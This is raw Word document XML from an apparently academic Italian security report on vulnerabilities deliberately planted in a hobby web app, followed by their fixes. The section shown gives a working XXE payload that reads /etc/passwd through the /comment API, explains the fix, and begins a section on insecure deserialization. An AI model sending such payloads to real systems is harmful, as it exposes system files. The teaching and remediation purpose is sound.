    <w:p w14:paraId="2FA5536F" w14:textId="27E1C2C3" w:rsidR="00850623" w:rsidRDefault="00850623" w:rsidP="00850623">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lato frontend, n</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">el componente </w:t>
      </w:r>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbiePages.jsx</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> è stat</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> introdotta la possibilità di inserire un commento nell’hobby di un utente o dal business</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Figura 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) mentre nel backend in </w:t>
      </w:r>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è stata creata l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in cui si fa il parsing del commento da mostrare come mostrato in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF0EBE" w14:textId="747E9CF1" w:rsidR="00850623" w:rsidRDefault="00850623" w:rsidP="00850623">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">Il commento viene scritto in </w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> e non contiene nessuna sanitizzazione</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8404FD" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F93D45" w14:textId="0032A105" w:rsidR="000C60C5" w:rsidRPr="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C60C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD9F43" w14:textId="68BCF3FA" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Per effettuare l’attacco bisogna andare nella sezione hobby dell’utente, inserire un commento e, dalla sezione network del web developer tool, fare Edit e Resend e usare il seguente payload</w:t>
      </w:r>
      <w:r w:rsidR="0096086E">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>51</w:t>
      </w:r>
      <w:r w:rsidR="0096086E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46449F3C" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C892AA" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF8BFB" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!DOCTYPE replace [&lt;!ENTITY ent SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99D85A" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DC910" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;text&gt;&amp;ent;&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E758E2" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="000C60C5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB274F" w14:textId="21F3AD08" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tale payload definisce un’entità </w:t>
      </w:r>
      <w:r w:rsidR="0096086E">
        <w:t xml:space="preserve">esterna </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che si riferisce al file </w:t>
      </w:r>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="0096086E">
        <w:t xml:space="preserve">. Successivamente questa entità viene richiamata nell’elemento text, in modo </w:t>
      </w:r>
      <w:r w:rsidR="00850623">
        <w:t>che,</w:t>
      </w:r>
      <w:r w:rsidR="0096086E">
        <w:t xml:space="preserve"> quando il parser XML elabora il documento sostituisce l’entità con il contenuto di etc/passwd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFD8D6" w14:textId="350F874F" w:rsidR="000C60C5" w:rsidRDefault="00A62E0F" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251979776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB83865" wp14:editId="6952F5E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4585335" cy="3705321"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="2124359960"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5335" cy="3705321"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1E0FA" w14:textId="43036A32" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22207C96" w14:textId="42E061AA" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38985A53" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="34B3EDA7" w14:textId="1F84C789" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3C70D790" w14:textId="3BD58C6B" w:rsidR="00A54E4E" w:rsidRDefault="00A54E4E"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67F53200" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12BCCBE7" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="11E7DC46" w14:textId="252C1F76" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251845632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19A409ED" wp14:editId="28BFBEF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4099560" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="593933685" name="Casella di testo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F4D243A" w14:textId="36E86467"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>49</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: HobbiePages.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09ED" id="_x0000_s1076" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:20.3pt;width:322.8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JgGgIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L066JVi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yfxre30xmFJMVmH6c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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5F4D243A" w14:textId="36E86467"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>49</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbiePages.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A6826" w14:textId="230F19BE" w:rsidR="00EB78A7" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251980800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="152D9B93" wp14:editId="155B43D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6143625" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="277237789"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952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E547FB8" w14:textId="696D20F5" w:rsidR="00FC6F6C" w:rsidRDefault="0096086E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251847680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="427133AD" wp14:editId="0A21D2B7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>431165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3019425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5250180" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2095299852" name="Casella di testo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0DBBC33F" w14:textId="1765EAF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33AD" id="_x0000_s1077" type="#_x0000_t202" style="position:absolute;margin-left:33.95pt;margin-top:237.75pt;width:41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fGQ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fDGd3ZJLku/m8yL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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0DBBC33F" w14:textId="1765EAF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0</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7C203" w14:textId="40EA6B65" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="34C84D5F" w14:textId="116677D0"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AEF610E" w14:textId="2C4E7BFC" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E6E88ED" w14:textId="0747FD07" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0A04A775" w14:textId="2682629D" w:rsidR="0031586D" w:rsidRDefault="0096086E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251849728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="730DD9E7" wp14:editId="72CBC8DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-387985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3280410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6888480" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="879222236" name="Casella di testo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C91C5B3" w14:textId="2BF0846B"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1</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: schermata browser con payload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D9E7" id="_x0000_s1078" type="#_x0000_t202" style="position:absolute;margin-left:-30.55pt;margin-top:258.3pt;width:54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e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5/NPcwpJis0+3s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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5C91C5B3" w14:textId="2BF0846B"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1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: schermata browser con payload malevolo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49DCBA60" wp14:editId="5E93F9DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-35179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5A6B9FA0" w14:textId="263F387A" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49FBC1BE" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="10C04939" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="30616B45" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1D91D2FD" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0CC1F93C" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E"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25C07AC3" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="571281BE" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0955EF0B" w14:textId="77777777" w:rsidR="0096086E" w:rsidRPr="0096086E" w:rsidRDefault="0096086E" w:rsidP="0096086E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA97D8" w14:textId="7E4E11B5" w:rsidR="0096086E" w:rsidRPr="001935CC" w:rsidRDefault="0096086E" w:rsidP="0096086E">
      <w:r>
        <w:t xml:space="preserve">Bisogna bloccare l’utilizzo di External Entities e Doctype di XML in modo da impedire l’attacco. </w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t>In particolare è stata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modifica</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t>ta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’API /comment nel backend</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve"> con l’aggiunta di istruzioni che bloccano </w:t>
      </w:r>
      <w:r w:rsidR="001935CC" w:rsidRPr="001935CC">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>le dichiarazioni di doctype, l’inserimento di entità esterne sia generali che parametriche e il caricamento di DTD definition esterne</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, come visibile in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00850623">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F536DB" w14:textId="09F5080C" w:rsidR="0096086E" w:rsidRDefault="00A62E0F" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251981824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="391B18FE" wp14:editId="2E89D74C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>107950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6286500" cy="2883140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="66367161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2883140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B87EE" w14:textId="6A5B9677" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251851776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BEC690D" wp14:editId="2D80BB30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>378460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2738120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5362575" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3925633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E8BD6A2" w14:textId="6F7C8CEE"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2</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690D" id="_x0000_s1079" type="#_x0000_t202" style="position:absolute;margin-left:29.8pt;margin-top:215.6pt;width:422.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b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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2E8BD6A2" w14:textId="6F7C8CEE"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>52</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE63AE" w14:textId="606365A0" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5EAB649B" w14:textId="555EC769" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CB80C2D" w14:textId="46E90BE4" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F06F1C0" w14:textId="744C72AE" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="22963997" w14:textId="6E533A6B"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Pr="001935CC" w:rsidRDefault="00E464AA" w:rsidP="001935CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F450595" w14:textId="568EF6C0" w:rsidR="00D03FA6" w:rsidRDefault="001935CC" w:rsidP="001935CC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: AccountUser.jsx, UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C2A83" w14:textId="21CFE703" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 114 di UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B71570" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787E44D5" w14:textId="26D02717" w:rsidR="00CC03BC" w:rsidRDefault="004E4997" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa vulnerabilità si ha quando dati gestiti dall’utente vengono </w:t>
      </w:r>
      <w:r w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deserializzati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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1D457B14" w:rsidR="00E464AA" w:rsidRDefault="00EF10FE" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo codice è</w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve"> stato aggiunto un campo credit che si incrementa ogni 30 secondi e premia gli utenti più attivi</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve">, gestito da </w:t>
      </w:r>
      <w:r w:rsidR="001935CC" w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AccountUser.jsx</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve"> per il frontend </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t>(Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve">e dall’API </w:t>
      </w:r>
      <w:r w:rsidR="001935CC" w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/updateCredit</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="001935CC" w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve"> per il backend</w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t xml:space="preserve"> (Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A62E0F">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
